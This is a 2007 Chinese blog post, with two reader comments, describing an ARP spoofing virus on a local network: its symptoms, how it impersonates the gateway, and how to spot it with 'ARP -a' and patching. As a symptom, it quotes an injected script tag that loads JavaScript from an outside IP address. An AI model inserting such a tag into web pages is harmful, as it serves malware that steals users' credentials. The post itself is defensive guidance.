Aug 22, 2007

ARP 病毒以及解决办法

首先强调下,这个病毒并不是一个新病毒,只是因为最近俺们系的局域网里闹了一次,所以拿出来说说。

现象:

  1. 电脑上网特别慢,甚至无法上网。
  2. 打开网页后查看源代码会发现代码前被加了一小段如下的代码(地址可能不同)。
    <script src=http://66.186.33.44/n.js></script>
  3. 打开一些需要运行javascript的网页只能看到乱码。
  4. 同时多台在C类网段的电脑出现上述之一的情况。
  5. 出现上述任何一条情况都有可能是ARP病毒。

分析:

这是一个典型的ARP病毒。原作者用自以为高明的办法给源代码加了密,其实稍有点计算机知识的人就能破解。具体病毒代码我就不深入分析了,目的就是利用微软的漏洞来偷些用户资料,比方说游戏的用户名和密码什么的。如果说散这个病毒是为了好玩,那么我可怜it,整个一情商低能儿;如果说是为了卖资料换钱,那是犯罪,这种东西连鄙视it都觉得是浪费自己感情。

说远了。其实ARP病毒,就是中毒的电脑会把自己伪装成你所在C类网段的gateway,这样就可以让局域网内其他电脑必须通过它才可以上网,从而截取数据包中的一些信息了。这样会导致其他没中毒电脑的上网速度下降甚至断网等症状。

解决办法:

可以在行命令方式键入命令:“ARP -a”,如果网内有人中毒的话,你就会发现最少有两台电脑的MAC地址是一样的,记录下来,汇报给网管。接下来的任务就是由网管找出被感染的电脑,然后杀之。

作为终端用户,咱们要做的就是开着系统的自动更新功能,微软的东西,不打补丁是很危险的。其次就是一定要安装杀毒软件,做到防患于未然。对于这个病毒来说,一般的杀毒软件都能搞定它。

Tags:
Post by SUN @ 4:28 pm | 与时俱进 | Comments (2) | Add to del.icio.us | Digg This!
  • At 2007.10.02 16:37, LI Daobing said:

    单纯的"ARP -a"不好用,因为你最近没有联系过的电脑不在那个列表里边,你可以从1到255,ping一个记录一个。

    [Reply]      

    • At 2007.10.02 17:24, SUN said:

      谢谢daobing~

      [Reply]      

(Required)
(Required, will not be published)